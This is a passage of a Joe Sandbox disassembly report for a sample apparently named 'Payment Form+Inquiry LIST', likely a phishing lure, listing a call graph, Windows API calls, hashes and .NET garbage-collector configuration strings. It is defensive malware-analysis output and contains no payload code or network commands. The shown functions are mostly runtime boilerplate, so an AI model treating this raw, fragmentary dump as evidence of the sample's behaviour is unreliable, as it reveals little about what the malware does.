7ff6e825d7a0 18 API calls 16241->16242 16243 7ff6e82641c8 16242->16243 16244 7ff6e825d7a0 18 API calls 16243->16244 16245 7ff6e82641f1 16244->16245 16246 7ff6e825d7a0 18 API calls 16245->16246 16247 7ff6e826421a 16246->16247 16248 7ff6e825d7a0 18 API calls 16247->16248 16249 7ff6e8264243 16248->16249 16250 7ff6e825d7a0 18 API calls 
16249->16250 16251 7ff6e826426c 16250->16251 16252 7ff6e825d7a0 18 API calls 16251->16252 16253 7ff6e8264295 16252->16253 16254 7ff6e825d7a0 18 API calls 16253->16254 16255 7ff6e82642be 16254->16255 16256 7ff6e825d7a0 18 API calls 16255->16256 16257 7ff6e82642e7 16256->16257 16258 7ff6e825d7a0 18 API calls 16257->16258 16259 7ff6e8264310 16258->16259 16260 7ff6e825d7a0 18 API calls 16259->16260 16261 7ff6e8264339 16260->16261 16262 7ff6e825d7a0 18 API calls 16261->16262 16263 7ff6e8264362 16262->16263 16264 7ff6e825d7a0 18 API calls 16263->16264 16265 7ff6e826438b 16264->16265 16266 7ff6e825d7a0 18 API calls 16265->16266 16267 7ff6e82643b4 16266->16267 16268 7ff6e825d7a0 18 API calls 16267->16268 16269 7ff6e82643dd 16268->16269 16270 7ff6e825d7a0 18 API calls 16269->16270 16271 7ff6e826440b 16270->16271 16272 7ff6e825d7a0 18 API calls 16271->16272 16273 7ff6e8264439 16272->16273 16274 7ff6e825d7a0 18 API calls 16273->16274 16275 7ff6e8264467 16274->16275 16276 7ff6e825d7a0 18 API calls 16275->16276 16277 7ff6e8264495 16276->16277 16278 7ff6e825d7a0 18 API calls 16277->16278 16279 7ff6e82644c3 16278->16279 16280 7ff6e825d7a0 18 API calls 16279->16280 16281 7ff6e82644f1 16280->16281 16282 7ff6e825d7a0 18 API calls 16281->16282 16283 7ff6e826451a 16282->16283 16284 7ff6e825d7a0 18 API calls 16283->16284 16285 7ff6e8264548 16284->16285 16286 7ff6e825d7a0 18 API calls 16285->16286 16287 7ff6e8264571 16286->16287 16288 7ff6e825d7a0 18 API calls 16287->16288 16289 7ff6e826459a 16288->16289 16290 7ff6e825d7a0 18 API calls 16289->16290 16291 7ff6e82645c8 16290->16291 16292 7ff6e825d7a0 18 API calls 16291->16292 16293 7ff6e825cce5 16292->16293 16294 7ff6e8262760 GetSystemInfo 16293->16294 16295 7ff6e82627a4 16294->16295 16296 7ff6e82627a8 GetNumaHighestNodeNumber 16295->16296 16297 7ff6e82627ce GetCurrentProcess GetProcessGroupAffinity 16295->16297 16296->16297 16298 7ff6e82627b7 16296->16298 16299 7ff6e82627f9 GetLastError 16297->16299 16300 7ff6e8262804 16297->16300 
16298->16297 16299->16300 16302 7ff6e8262826 16300->16302 16310 7ff6e8262540 GetLogicalProcessorInformationEx 16300->16310 16303 7ff6e8262890 GetCurrentProcess GetProcessAffinityMask 16302->16303 16304 7ff6e825ccea 16302->16304 16303->16304 16304->16100 16304->16106 16306 7ff6e825d6f4 16305->16306 16307 7ff6e825d6f8 16306->16307 16308 7ff6e825df30 8 API calls 16306->16308 16307->16159 16309 7ff6e825d724 16308->16309 16309->16159 16311 7ff6e826272c 16310->16311 16312 7ff6e8262572 GetLastError 16310->16312 16311->16302 16312->16311 16313 7ff6e8262581 16312->16313 16313->16311 16314 7ff6e826259d GetLogicalProcessorInformationEx 16313->16314 16315 7ff6e82625c0 16314->16315 16315->16302 16317 7ff6e8260ca0 InitializeCriticalSectionEx 16316->16317 16318 7ff6e8260cfe 16317->16318 16318->16118 16320 7ff6e82b08c3 InitializeCriticalSectionEx 16319->16320 16322 7ff6e82b0c50 _swprintf_c_l 3 API calls 16321->16322 16323 7ff6e82576ce 16322->16323 16324 7ff6e8260ca0 InitializeCriticalSectionEx 16323->16324 16325 7ff6e8257700 16323->16325 16324->16325 16325->16129 16327 7ff6e8254102 16326->16327 16328 7ff6e825413d 16327->16328 16340 7ff6e8260b30 CreateEventW 16327->16340 16328->16144 16330 7ff6e8254114 16330->16328 16341 7ff6e825cf20 CreateThread 16330->16341 16332 7ff6e8254133 16332->16144 16334 7ff6e825f717 16333->16334 16335 7ff6e825f71f 16334->16335 16336 7ff6e82b0c50 _swprintf_c_l 3 API calls 16334->16336 16335->16145 16338 7ff6e825f751 16336->16338 16339 7ff6e825f7e5 16338->16339 16344 7ff6e82653b0 16338->16344 16339->16145 16340->16330 16342 7ff6e825cf55 SetThreadPriority ResumeThread FindCloseChangeNotification 16341->16342 16343 7ff6e825cf4f 16341->16343 16342->16332 16343->16332 16345 7ff6e82653e3 _swprintf_c_l 16344->16345 16349 7ff6e8265409 _swprintf_c_l 16345->16349 16350 7ff6e82664f0 16345->16350 16347 7ff6e8265400 16348 7ff6e8260ca0 InitializeCriticalSectionEx 16347->16348 16347->16349 16348->16349 16349->16338 16349->16349 16351 7ff6e8262ab0 3 API calls 16350->16351 
16352 7ff6e8266512 16351->16352 16353 7ff6e826651a 16352->16353 16354 7ff6e82629e0 3 API calls 16352->16354 16353->16347 16355 7ff6e8266538 16354->16355 16358 7ff6e8266543 _swprintf_c_l 16355->16358 16359 7ff6e8262a90 VirtualFree 16355->16359 16357 7ff6e826665e 16357->16347 16358->16347 16359->16357 16360->16156 16361 7ff6e826c75f 16362 7ff6e826c764 16361->16362 16363 7ff6e8291540 4 API calls 16362->16363 16364 7ff6e826c86d 16363->16364 16365 7ff6e826c898 16364->16365 16366 7ff6e8284530 2 API calls 16364->16366 16367 7ff6e8273ff0 6 API calls 16365->16367 16366->16365 16368 7ff6e826c902 16367->16368 16369 7ff6e8260d20 16370 7ff6e8260d3e 16369->16370 16371 7ff6e8260de1 16370->16371 16377 7ff6e825cf90 VirtualAlloc 16370->16377

                            Control-flow Graph

                            APIs
                            • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6E825CCEA), ref: 00007FF6E826276F
                            • GetNumaHighestNodeNumber.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF6E825CCEA), ref: 00007FF6E82627AD
                            • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6E825CCEA), ref: 00007FF6E82627D9
                            • GetProcessGroupAffinity.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF6E825CCEA), ref: 00007FF6E82627EA
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6E825CCEA), ref: 00007FF6E82627F9
                            • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6E825CCEA), ref: 00007FF6E8262890
                            • GetProcessAffinityMask.KERNEL32 ref: 00007FF6E82628A3
                            Memory Dump Source
                            • Source File: 00000000.00000002.1331895882.00007FF6E8251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E8250000, based on PE: true
                            • Associated: 00000000.00000002.1331871186.00007FF6E8250000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1332005729.00007FF6E8369000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1332053620.00007FF6E83A9000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1332144292.00007FF6E8419000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1332144292.00007FF6E841F000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1332144292.00007FF6E8424000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1332232004.00007FF6E8427000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff6e8250000_Payment Form+Inquiry LIST.jbxd
                            Similarity
                            • API ID: Process$AffinityCurrent$ErrorGroupHighestInfoLastMaskNodeNumaNumberSystem
                            • String ID:
                            • API String ID: 580471860-0
                            • Opcode ID: 4e2cce3fcde6afbf2e26333a9f233b0a1031100ac6ea6b6a841eac30e88da66a
                            • Instruction ID: fc092e238cee2e319505bd2ce591df6422ebff12ecf18519c4629371e31fa07a
                            • Opcode Fuzzy Hash: 4e2cce3fcde6afbf2e26333a9f233b0a1031100ac6ea6b6a841eac30e88da66a
                            • Instruction Fuzzy Hash: E2515973A2C74A8BEA51CF35A9003A863A1FB94B80F884071D94DD7364DF2EE548D75E

                            Control-flow Graph

                            APIs
                              • Part of subcall function 00007FF6E825CCC0: FlsAlloc.KERNEL32(?,?,?,?,?,?,?,?,00007FF6E8257D0F,?,?,?,?,?,?,00007FF6E8251C00), ref: 00007FF6E825CCCB
                              • Part of subcall function 00007FF6E825CCC0: QueryInformationJobObject.KERNEL32 ref: 00007FF6E825CD9E
                              • Part of subcall function 00007FF6E825CA50: GetModuleHandleExW.KERNEL32(?,?,?,?,00007FF6E8257D38,?,?,?,?,?,?,00007FF6E8251C00), ref: 00007FF6E825CA61
                            • RtlAddVectoredExceptionHandler.NTDLL ref: 00007FF6E8257D99
                            • RaiseFailFastException.KERNEL32(?,?,?,?,?,?,00007FF6E8251C00), ref: 00007FF6E8257E83
                            Similarity
                            • API ID: Exception$AllocFailFastHandleHandlerInformationModuleObjectQueryRaiseVectored
                            • String ID: The required instruction sets are not supported by the current CPU.$StressLogLevel$TotalStressLogSize
                            • API String ID: 2052584837-2841289747
                            • Opcode ID: 6dcd47bc64c54c688195ce006d8b6216d66789526cdab3b23211efa9f49683d5
                            • Instruction ID: 09f8f13ea13b610793348e1155bb5995a38f4d7c929f7797189a66f637d41d2d
                            • Opcode Fuzzy Hash: 6dcd47bc64c54c688195ce006d8b6216d66789526cdab3b23211efa9f49683d5
                            • Instruction Fuzzy Hash: 5D419C23E997428EEA01AB7096017B86391BF51784F480031ED4D8769EDF2EF905C38F

                            Control-flow Graph

                            APIs
                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF6E82B0C59,?,?,?,?,00007FF6E825E371,?,?,?,00007FF6E825E8F4,00000000,00000020,?), ref: 00007FF6E82B156E
                            • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6E82B1584
                              • Part of subcall function 00007FF6E82B19B4: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF6E82B19BD
                            Similarity
                            • API ID: Concurrency::cancel_current_taskmallocstd::bad_alloc::bad_alloc
                            • String ID:
                            • API String ID: 205171174-0
                            • Opcode ID: c2fe932289e9420f36de46b9144fd52e3974bbea9026eb45ed96a2d6b2463895
                            • Instruction ID: d23d2778b67dc23b6a4093d3abbd166d9f38955547450217d0be813cd37c4504
                            • Opcode Fuzzy Hash: c2fe932289e9420f36de46b9144fd52e3974bbea9026eb45ed96a2d6b2463895
                            • Instruction Fuzzy Hash: 6781BC73E0960289F715CF39A9413683AE0EB043A4F444739D92DC76E8DE3EA459978E

                            Control-flow Graph

                            Similarity
                            • API ID: CurrentProcess
                            • String ID: P=*
                            • API String ID: 2050909247-581859018
                            • Opcode ID: e78b3909f8ea25d473e67f9112f21475dc84ab5c971eb88372a6baac30c71a1f
                            • Instruction ID: 41482f64ed56a43d11eb3ade91000c1de7f0f0b86d84c180a32dc66f0db934e9
                            • Opcode Fuzzy Hash: e78b3909f8ea25d473e67f9112f21475dc84ab5c971eb88372a6baac30c71a1f
                            • Instruction Fuzzy Hash: E5029EA3E0D646CAFA15CB35AA4473876A1EF54790F058635C40DD3260EF3EB499C78E
                            Memory Dump Source
                            • Source File: 00000000.00000002.1331895882.00007FF6E8251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E8250000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff6e8250000_Payment Form+Inquiry LIST.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a6bad46461646456b0845c2c71dcf6c7b8a409867b5bf0591358b8ce704b71c6
                            • Instruction ID: 9133a6580ccccb5291bf03d291462cf977e2999b23f67ec31b3c39f8f313cece
                            • Opcode Fuzzy Hash: a6bad46461646456b0845c2c71dcf6c7b8a409867b5bf0591358b8ce704b71c6
                            • Instruction Fuzzy Hash: 7AF16163D1CB47CAFA02DB34AA51375A261EFA5380F558335D40DD22A2FF2E7495838E

                            Control-flow Graph

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1331895882.00007FF6E8251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E8250000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff6e8250000_Payment Form+Inquiry LIST.jbxd
                            Similarity
                            • API ID: GlobalMemoryStatus$Process$CurrentInformationObjectQuery
                            • String ID: @$@$@
                            • API String ID: 2645093340-1177533131
                            • Opcode ID: 95225103daefa8726f68f1ab5db984df9ad458603156aeec33b16addcc65e5e3
                            • Instruction ID: a49b69a3f65f94cd1b533467eaf7823eef4de78a97b4c4cae27f54cbf3d549a0
                            • Opcode Fuzzy Hash: 95225103daefa8726f68f1ab5db984df9ad458603156aeec33b16addcc65e5e3
                            • Instruction Fuzzy Hash: C8416332619AC18AEA718F21E5443A9B360FB84B60F484275DFAD93AD8CF3DD444C749

                            Control-flow Graph

                            APIs
                            • FlsAlloc.KERNEL32(?,?,?,?,?,?,?,?,00007FF6E8257D0F,?,?,?,?,?,?,00007FF6E8251C00), ref: 00007FF6E825CCCB
                              • Part of subcall function 00007FF6E8262760: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6E825CCEA), ref: 00007FF6E826276F
                              • Part of subcall function 00007FF6E8262760: GetNumaHighestNodeNumber.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF6E825CCEA), ref: 00007FF6E82627AD
                              • Part of subcall function 00007FF6E8262760: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6E825CCEA), ref: 00007FF6E82627D9
                              • Part of subcall function 00007FF6E8262760: GetProcessGroupAffinity.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF6E825CCEA), ref: 00007FF6E82627EA
                              • Part of subcall function 00007FF6E8262760: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6E825CCEA), ref: 00007FF6E82627F9
                            • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,00007FF6E8257D0F,?,?,?,?,?,?,00007FF6E8251C00), ref: 00007FF6E825CD3D
                            • GetProcessAffinityMask.KERNEL32 ref: 00007FF6E825CD50
                            • QueryInformationJobObject.KERNEL32 ref: 00007FF6E825CD9E
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1331895882.00007FF6E8251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E8250000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff6e8250000_Payment Form+Inquiry LIST.jbxd
                            Similarity
                            • API ID: Process$AffinityCurrent$AllocErrorGroupHighestInfoInformationLastMaskNodeNumaNumberObjectQuerySystem
                            • String ID: PROCESSOR_COUNT
                            • API String ID: 1701933505-4048346908
                            • Opcode ID: c890785a539d5afcbefa23d8d6d40b219dc5395e8b11610044fd4b18a0a910d1
                            • Instruction ID: 6b4299a971e02640766161a259f8780ffea3c4aac6dd72c5fc096e056cfc1851
                            • Opcode Fuzzy Hash: c890785a539d5afcbefa23d8d6d40b219dc5395e8b11610044fd4b18a0a910d1
                            • Instruction Fuzzy Hash: 3F318E73A59B428AEA249B60D6403B967A1EF40754F440031DA4DC76D9EE2EE408D78F

                            Control-flow Graph

                            APIs
                            Strings
                            • Fatal error. Invalid Program: attempted to call a UnmanagedCallersOnly method from managed code., xrefs: 00007FF6E82532F6
                            Memory Dump Source
                            • Source File: 00000000.00000002.1331895882.00007FF6E8251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E8250000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff6e8250000_Payment Form+Inquiry LIST.jbxd
                            Similarity
                            • API ID: ExceptionFailFastRaise$Sleep
                            • String ID: Fatal error. Invalid Program: attempted to call a UnmanagedCallersOnly method from managed code.
                            • API String ID: 3706814929-926682358
                            • Opcode ID: 509191a938dc5721182cf2216d0e9699bb1c5f14f2451f1e6e328690f9fb4e79
                            • Instruction ID: 4ea60efafe8d8db364ffc861a2f34b61c58d2ea1e8d9668d24ce4b366f301936
                            • Opcode Fuzzy Hash: 509191a938dc5721182cf2216d0e9699bb1c5f14f2451f1e6e328690f9fb4e79
                            • Instruction Fuzzy Hash: 4F414F33A59B428AEB519B25E55437923E0EB05784F04903AC94DC62A4DF3FE859C38F

                            Control-flow Graph

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1331895882.00007FF6E8251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E8250000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff6e8250000_Payment Form+Inquiry LIST.jbxd
                            Similarity
                            • API ID: Thread$ChangeCloseCreateFindNotificationPriorityResume
                            • String ID:
                            • API String ID: 2150560229-0
                            • Opcode ID: 9511c21b225c2505e3656d620379201a906c5cfbeca7072923825b3915600e7d
                            • Instruction ID: dfb7d9e921dc192e9a4b9e09d39491f6b96a2c4fbe4d562823ff36a9730e12b0
                            • Opcode Fuzzy Hash: 9511c21b225c2505e3656d620379201a906c5cfbeca7072923825b3915600e7d
                            • Instruction Fuzzy Hash: D5E0E5AAA0470182FF149B71A8183755351AFA8B91F4C0074CD5E4A3E0EE3D8185450C

                            Control-flow Graph

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1331895882.00007FF6E8251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E8250000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff6e8250000_Payment Form+Inquiry LIST.jbxd
                            Similarity
                            • API ID: CurrentGlobalMemoryProcessStatus
                            • String ID: @
                            • API String ID: 3261791682-2766056989
                            • Opcode ID: a7052b65163810799a708a6fe7c5f255f8a0101645a1a73b8d3173c2a00ec693
                            • Instruction ID: 77e35be5148409703958c275865809146fa293e23a52874ec6883755e03e3378
                            • Opcode Fuzzy Hash: a7052b65163810799a708a6fe7c5f255f8a0101645a1a73b8d3173c2a00ec693
                            • Instruction Fuzzy Hash: 37411823B29B464EEA56CA3692103399252EF59BC0F18C732DD1DB2744FF3EE4819649

                            Control-flow Graph

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1331895882.00007FF6E8251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E8250000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff6e8250000_Payment Form+Inquiry LIST.jbxd
                            Similarity
                            • API ID: Count64Tick
                            • String ID: D)
                            • API String ID: 1927824332-848725745
                            • Opcode ID: 7904b99c7dc68c0cae2b5c7310acba6e0ea9d0dd2db6736425592f235cfd3e95
                            • Instruction ID: 9881c88432e505cea3b9a3b85cd0a25f86be4f4d43f8ce0df61aa6118a60d8ac
                            • Opcode Fuzzy Hash: 7904b99c7dc68c0cae2b5c7310acba6e0ea9d0dd2db6736425592f235cfd3e95
                            • Instruction Fuzzy Hash: C0415723E2D752CEEA609B31AA4437962A1EF00784F144532CD0DE36A5DE3FE449938F

                            Control-flow Graph

                            APIs
                            • VirtualAlloc.KERNELBASE(?,?,?,?,00000000,00007FF6E8266538,?,?,0000000B,00007FF6E8265400,?,?,00000000,00007FF6E825F7C1), ref: 00007FF6E8262A07
                            • GetCurrentProcess.KERNEL32(?,?,?,?,00000000,00007FF6E8266538,?,?,0000000B,00007FF6E8265400,?,?,00000000,00007FF6E825F7C1), ref: 00007FF6E8262A27
                            • VirtualAllocExNuma.KERNEL32 ref: 00007FF6E8262A48
                            Memory Dump Source
                            • Source File: 00000000.00000002.1331895882.00007FF6E8251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E8250000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff6e8250000_Payment Form+Inquiry LIST.jbxd
                            Similarity
                            • API ID: AllocVirtual$CurrentNumaProcess
                            • String ID:
                            • API String ID: 647533253-0
                            • Opcode ID: 30b1441a2bea7775d7c955215729cdf2e5a892d16db3f8955b52174439e52f72
                            • Instruction ID: 079e1cb19d824eced01c64e537c39a283e974ed02c81a982cffc046d095bbf48
                            • Opcode Fuzzy Hash: 30b1441a2bea7775d7c955215729cdf2e5a892d16db3f8955b52174439e52f72
                            • Instruction Fuzzy Hash: 05F0AF72B0869186EB208B26F500319A760BB59FD4F080178EF9C67B98DF3EC581CB08

                            Control-flow Graph

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1331895882.00007FF6E8251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E8250000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff6e8250000_Payment Form+Inquiry LIST.jbxd
                            Similarity
                            • API ID: Virtual$AllocFree
                            • String ID:
                            • API String ID: 2087232378-0
                            • Opcode ID: 9b4b0e60d32251690daea8b7a5fffc301cfc6528cc5a9902456aa392ed653aa5
                            • Instruction ID: 0e51c905714136ebd037936317166f8fc8c62572d83754a86aa61216b2fe2f2d
                            • Opcode Fuzzy Hash: 9b4b0e60d32251690daea8b7a5fffc301cfc6528cc5a9902456aa392ed653aa5
                            • Instruction Fuzzy Hash: 6AE0CD35F16601C6FF58973268417141351AF99B00FC4C078C40D977D0DD2F615ADB49

                            Control-flow Graph

                            APIs
                            • CoInitializeEx.OLE32(?,?,?,?,00000030,?,?,?,?,?,?,?,00007FF6E82E1950,?,?,00000030), ref: 00007FF6E82E1B09
                            Memory Dump Source
                            • Source File: 00000000.00000002.1331895882.00007FF6E8251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E8250000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff6e8250000_Payment Form+Inquiry LIST.jbxd
                            Similarity
                            • API ID: Initialize
                            • String ID:
                            • API String ID: 2538663250-0
                            • Opcode ID: a397c68d9d6042325afacf9ff6cce955754c6f6ab0659fade62fac1c0edc7dc7
                            • Instruction ID: e0fbeb3dd02e394d7e7a4baa582dd519fbeda2d2f71da864f8aaaba4f551b8d5
                            • Opcode Fuzzy Hash: a397c68d9d6042325afacf9ff6cce955754c6f6ab0659fade62fac1c0edc7dc7
                            • Instruction Fuzzy Hash: 8931F223E086169DFB129771EA113BD62546F40780F444136DD0DDB79AEE3EE881838F

                            Control-flow Graph

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1331895882.00007FF6E8251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E8250000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff6e8250000_Payment Form+Inquiry LIST.jbxd
                            Similarity
                            • API ID: CurrentExceptionFailFastQueryRaiseThreadVirtual
                            • String ID:
                            • API String ID: 2131581837-0
                            • Opcode ID: 5ea28ad98453398e5207998a158429e1aa3c9fd4ffe220d449b8d9d8c7c207fb
                            • Instruction ID: 753ca33785ed7d6ce77a0e99ca344daaea7469e95f19c81a9e0488892a17aeb4
                            • Opcode Fuzzy Hash: 5ea28ad98453398e5207998a158429e1aa3c9fd4ffe220d449b8d9d8c7c207fb
                            • Instruction Fuzzy Hash: A3119E73908B8186DA24DF25B4012AEB360FB447B0F144339E6BD8B7DACF39D442874A
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1331895882.00007FF6E8251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E8250000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff6e8250000_Payment Form+Inquiry LIST.jbxd
                            Similarity
                            • API ID: FreeVirtual
                            • String ID:
                            • API String ID: 1263568516-0
                            • Opcode ID: 6b29141644b4f393e6c212dee8608d45edcd92e76b8a00e80d54dc913ba57c49
                            • Instruction ID: d00d7d46373075c34a3a5d7ea2b2c52ba220e81c0a9aeee5ea1e3f34ec6450f3
                            • Opcode Fuzzy Hash: 6b29141644b4f393e6c212dee8608d45edcd92e76b8a00e80d54dc913ba57c49
                            • Instruction Fuzzy Hash: F5B01204F16041C2EB0427737C4230802253B15B02FC48064DA08F12D4CD1D81A54B09
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1331895882.00007FF6E8251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E8250000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff6e8250000_Payment Form+Inquiry LIST.jbxd
                            Similarity
                            • API ID:
                            • String ID: BGCFLEnableFF$BGCFLEnableKd$BGCFLEnableKi$BGCFLEnableSmooth$BGCFLEnableTBH$BGCFLGradualD$BGCFLSmoothFactor$BGCFLSweepGoal$BGCFLSweepGoalLOH$BGCFLTuningEnabled$BGCFLff$BGCFLkd$BGCFLki$BGCFLkp$BGCG2RatioStep$BGCMLki$BGCMLkp$BGCMemGoal$BGCMemGoalSlack$BGCSpin$BreakOnOOM$CompactRatio$ConcurrentGC$ConfigLogEnabled$ConfigLogFile$ConservativeGC$ForceCompact$GCConfigLogFile$GCConserveMem$GCCpuGroup$GCDTargetTCP$GCDynamicAdaptationMode$GCEnableSpecialRegions$GCEnabledInstructionSets$GCGen0MaxBudget$GCGen1MaxBudget$GCHeapAffinitizeMask$GCHeapAffinitizeRanges$GCHeapHardLimit$GCHeapHardLimitLOH$GCHeapHardLimitLOHPercent$GCHeapHardLimitPOH$GCHeapHardLimitPOHPercent$GCHeapHardLimitPercent$GCHeapHardLimitSOH$GCHeapHardLimitSOHPercent$GCHighMemPercent$GCLargePages$GCLogFile$GCLowSkipRatio$GCName$GCNumaAware$GCPath$GCProvModeStress$GCRegionRange$GCRegionSize$GCSpinCountUnit$GCTotalPhysicalMemory$Gen0Size$HeapCount$HeapVerifyLevel$LOHCompactionMode$LOHThreshold$LatencyLevel$LatencyMode$LogEnabled$LogFile$LogFileSize$MaxHeapCount$NoAffinitize$RetainVM$SegmentSize$ServerGC$System.GC.Concurrent$System.GC.ConserveMemory$System.GC.CpuGroup$System.GC.DTargetTCP$System.GC.DynamicAdaptationMode$System.GC.HeapAffinitizeMask$System.GC.HeapAffinitizeRanges$System.GC.HeapCount$System.GC.HeapHardLimit$System.GC.HeapHardLimitLOH$System.GC.HeapHardLimitLOHPercent$System.GC.HeapHardLimitPOH$System.GC.HeapHardLimitPOHPercent$System.GC.HeapHardLimitPercent$System.GC.HeapHardLimitSOH$System.GC.HeapHardLimitSOHPercent$System.GC.HighMemoryPercent$System.GC.LOHThreshold$System.GC.LargePages$System.GC.MaxHeapCount$System.GC.Name$System.GC.NoAffinitize$System.GC.Path$System.GC.RetainVM$System.GC.Server
                            • API String ID: 0-1379766591
                            • Opcode ID: bfe385bf2e7e8c94031eee7b4a47a92a4b86f4fa3b6bfc22cbeaf3b91d706fc3
                            • Instruction ID: f2142628b8e1171bf29c6e51de337873def806ddebfa234b2e20049b888c586c
                            • Opcode Fuzzy Hash: bfe385bf2e7e8c94031eee7b4a47a92a4b86f4fa3b6bfc22cbeaf3b91d706fc3
                            • Instruction Fuzzy Hash: 9A426062608A57C2EB609B65F810BA963A1FFA47C8F451132D98C87B24DF3ED205C74E
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1331895882.00007FF6E8251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E8250000, based on PE: true
                            • Associated: 00000000.00000002.1331871186.00007FF6E8250000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1332005729.00007FF6E8369000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1332053620.00007FF6E83A9000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1332144292.00007FF6E8419000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1332144292.00007FF6E841F000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1332144292.00007FF6E8424000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1332232004.00007FF6E8427000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff6e8250000_Payment Form+Inquiry LIST.jbxd
                            Similarity
                            • API ID: strcmp
                            • String ID: 